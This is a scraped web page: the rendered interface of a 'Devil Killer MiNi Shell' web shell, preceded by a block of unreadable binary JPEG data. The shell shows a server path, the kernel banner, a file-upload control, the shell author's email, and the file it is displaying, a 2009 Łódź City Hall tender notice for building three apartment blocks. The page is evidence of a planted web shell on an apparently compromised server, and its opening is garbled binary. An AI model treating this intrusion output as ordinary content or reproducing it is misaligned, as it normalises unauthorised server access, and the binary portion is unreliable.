JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090916/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090916/157553-N-2009.html

<p class="kh_header"><b>Łódź: Wybór Wykonawcy komunalnych budynków wielorodzinnych nr 3, 4 i 5 na oś. Olechów Południe w Łodzi - przedsięwzięcie II, etap 2</b><br>
<b>Numer ogłoszenia: 157553 - 2009; data zamieszczenia: 16.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Łodzi - Wydział Budynków i Lokali , ul. Piotrkowska 104, 90-004 Łódź, woj. łódzkie, tel. 042 6384037, 6384698, faks 042 6384083.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór Wykonawcy komunalnych budynków wielorodzinnych nr 3, 4 i 5 na oś. Olechów Południe w Łodzi - przedsięwzięcie II, etap 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Trzy komunalne budynki wielorodzinne IV kondygnacyjne bez podpiwniczenia o konstrukcji żelbetowo-murowej o łącznej powierzchni użytkowej 7.668,55 m2 wraz z przyłączami wod-kan.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 300000.00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1. posiadają uprawnienia do wykonywania działalności lub czynności w zakresie odpowiadającym przedmiotowi zamówienia
2.   nie podlegają wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych
3.	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
a). wykonali należycie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, budynki mieszkalne wielorodzinne zawierające co najmniej 200 lokali mieszkalnych, których łączna powierzchnia użytkowa jest nie mniejsza niż 15.000 m2. 
b). dysponują osobami zdolnymi do wykonania zamówienia w tym uprawnionymi do kierowania robotami budowlanymi odpowiednich specjalności niezbędnymi do realizacji zamówienia stosownie do wymogów ustawy Prawo Budowlane.
4. znajdują  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
zamówienia, tj:
a) osiągnęli w okresie ostatnich 3 lat ( tj. 2006-2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, przychód netto ze sprzedaży produktów, towarów materiałów, stanowiących roboty budowlane sklasyfikowane w sekcji F w dziale 45 Polskiej Klasyfikacji Wyrobów i Usług,  ujętej w załączniku do Rozporządzenia Rady Ministrów w sprawie Polskiej Klasyfikacji Wyrobów i Usług ( Dz.U. Nr 89 z 2004 r. 
poz. 844),  w wysokości co najmniej 45,0 mln. zł.
b). wykażą się wskaźnikiem płynności bieżącej (III stopnia) wyliczonym jako bieżące aktywa / bieżące zobowiązania, nie mniejszym niż 1,00 za lata obrachunkowe 2007 i 2008.
c). wykażą się  wskaźnikiem płynności szybkiej (II stopnia) wyliczonym jako aktywa bieżące pomniejszone o zapasy i rozliczenia międzyokresowe czynne / pasywa bieżące lub jako środki pieniężne powiększone o płynne papiery wartościowe należności ściągalne / zobowiązania bieżące, nie mniejszym niż  0,6 za lata  obrachunkowe 2007 i 2008.
d). wykażą się posiadaniem polisy ubezpieczeniowej od odpowiedzialności cywilnej 
w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia na kwotę min. 2,0 mln zł
5. złożą zobowiązanie do zorganizowania na czas realizacji zamówienia stałej placówki organizacyjnej - biura na obszarze miasta Łodzi, w której znajdować będzie się przedstawicielstwo wykonawcy stanowiące miejsce siedziby osoby posiadającej niezbędne pełnomocnictwa do wykonania przedmiotu zamówienia. 
6.  udzielą co najmniej 5 - letniej gwarancji jakości i rękojmi za wady.
7.  wykonają min.60 % zakresu robót siłami własnymi..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu potwierdzenia że wykonawca posiada uprawnienia do wykonywania działalności  lub czynności w zakresie odpowiadającym przedmiotowi zamówienia:
a). aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 
6 miesięcy przed upływem terminu składania ofert. 
b). aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego, potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
W przypadku wspólnego ubiegania się o niniejsze zamówienie przez dwóch lub więcej wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego 
z nich. 
2.	W celu potwierdzenia że wykonawca nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych:
a). aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 
pkt 4 - 8 (Pzp), wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
b).	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym 
w art. 24 ust 1 pkt 9 ustawy Pzp, wystawioną nie wcześniej, niż 6 miesięcy przed upływem składania ofert o dopuszczenie do udziału w postępowaniu. 
W przypadku wspólnego ubiegania się o niniejsze zamówienie przez dwóch lub więcej wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego 
z nich. 
3.	W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a). wykaz wykonanych należycie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, budynków mieszkalnych wielorodzinnych zawierających co najmniej 200 lokali mieszkalnych o łącznej powierzchni użytkowej nie mniejszej niż 15.000 m2 wraz z podaniem: podmiotu na rzecz którego realizowane były roboty, miejsca realizacji, zakresu i wartości robót, daty rozpoczęcia i zakończenia oraz z załączeniem dokumentów wystawionych przez podmioty na rzecz których były realizowane, potwierdzających, ze roboty te zostały wykonane należycie - sporządzony na podstawie wzoru stanowiącego załącznik nr 4 do niniejszej SIWZ;
b). wykaz osób które będą uczestniczyć w wykonaniu niniejszego zamówienia w tym uprawnionych do kierowania robotami budowlanymi odpowiednich specjalności niezbędnymi do realizacji zamówienia stosownie do wymogów ustawy Prawo Budowlane, tj. osobami którym powierzone zostaną obowiązki kierownika budowy oraz kierowników robót konstrukcyjno-budowlanych, instalacyjnych w zakresie sieci wodociągowo - kanalizacyjnych, instalacji i urządzeń cieplnych, gazowych, elektrycznych, wodociągowych i kanalizacyjnych. Wymaga się udokumentowania ich kwalifikacji poprzez załączenie dokumentów potwierdzających spełnienie warunków wynikających z ustawy z dnia 7 lipca 1994 r. - Prawo budowlane (Dz.U. Nr 89, poz. 414 z późniejszymi zmianami) i ustawy  z dnia 15 grudnia 
2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz.U. z 2001 r. Nr 5 poz. 42 z późniejszymi zmianami) - sporządzony na podstawie wzoru stanowiącego załącznik nr 3 do niniejszej SIWZ;
W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał  techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie.
4.	W celu potwierdzenia, że wykonawca znajduje  się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia:
a). sprawozdanie finansowe (sporządzone zgodnie z wymogami ustawy z dnia 
29 września 1994 r. o rachunkowości - tekst jednolity Dz. U. z 2002 r. Nr 76, 
poz. 694 z późniejszymi zmianami), a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami ustawy o rachunkowości również z opinią 
o badanym sprawozdaniu, a w przypadku nie zobowiązanych (stosownie do przepisów Ustawy o rachunkowości)  do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za ostatnie 3 lata obrachunkowe (2006-2008), a jeżeli okres prowadzenia działalności jest krótszy - za ten okres. 
	W sytuacji gdy sprawozdanie finansowe wykonawcy nie zawiera informacji o strukturze rzeczowej (rodzaje działalności) i terytorialnej (kraj, eksport) przychodów netto ze sprzedaży produktów, towarów i materiałów, wykonawca winien złożyć inne, wybrane przez siebie dokumenty, potwierdzające spełnienie warunku, podpisane przez osoby stosownie do wymogów art. 52 ust. 2 ustawy o rachunkowości. 
W przypadku wspólnego ubiegania się dwóch lub więcej wykonawców o udzielenie niniejszego zamówienia, oceniana będzie ich łączna sytuacja ekonomiczna 
i finansowa - w tym celu dokumenty ma obowiązek złożyć ten lub ci z wykonawców, którzy w imieniu wszystkich wykazywać będą spełnienie tego warunku.
b). polisę lub inny dokument ubezpieczenia potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, zgodnej z przedmiotem niniejszego zamówienia, na kwotę co najmniej 2,0 mln PLN, ważny co najmniej do końca okresu związania ofertą. 
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, dokumenty ubezpieczenia winien złożyć każdy z nich.
5. Stosownie do § 2 rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. 
w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jaskich te dokumenty mogą być składane, jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, 
o których mowa powyżej w :
1) pkt 4.1.a) i 4.1.b) i 4.2.b), składa dokument lub dokumenty , wystawione w kraju, 
w którym ma siedzibę lub miejsce zamieszkania, potwierdzając odpowiednio, że ;
a) nie otwarto jego likwidacji i nie ogłoszono upadłości,
b) nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczone lub rozłożone na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2) pkt 4.2.a) składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 pzp.
3) Stosownie do treści § 2 ust. 2 powołanego powyżej w pkt 4.5.1a) i b) oraz 4.5.2) powinny być wystawione nie wcześniej niż 6 miesięcy przed terminem składania ofert. Natomiast dokument, o którym mowa powyżej w pkt 4.5.1b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem składania ofert.
4) Stosownie do treści § 2 ust. 3 powołanego powyżej rozporządzenia Prezesa Rady Ministrów, jeżeli w kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje dokumentów, o których mowa powyżej w pkt 4.1a), 4.1b), 4.2a), 4.2b), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia pkt 4.5.3) znajdą odpowiednie zastosowanie.
5) W przypadku złożenia  przez Wykonawcę dokumentów zawierających dane w innych walutach niż określono w pkt 4.3 i 4.4, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs EURO z dnia ogłoszenia zamówienia. Ten sam kurs Zamawiający przyjmie przy przeliczeniu wszelkich innych danych finansowych.
6. Ocena spełnienia przedstawionych powyżej warunków zostanie dokonana wg formuły : spełnia - nie spełnia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> bip.uml.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Łodzi, Wydział Budynków i Lokali, 90-004 Łódź, ul. Piotrkowska 104, pok. 048A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2009 godzina 10:00, miejsce: Urząd Miasta Łodzi, Wydział Budynków i Lokali, 90-004 Łódź, ul. Piotrkowska 104, budynek F, pok. 045.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com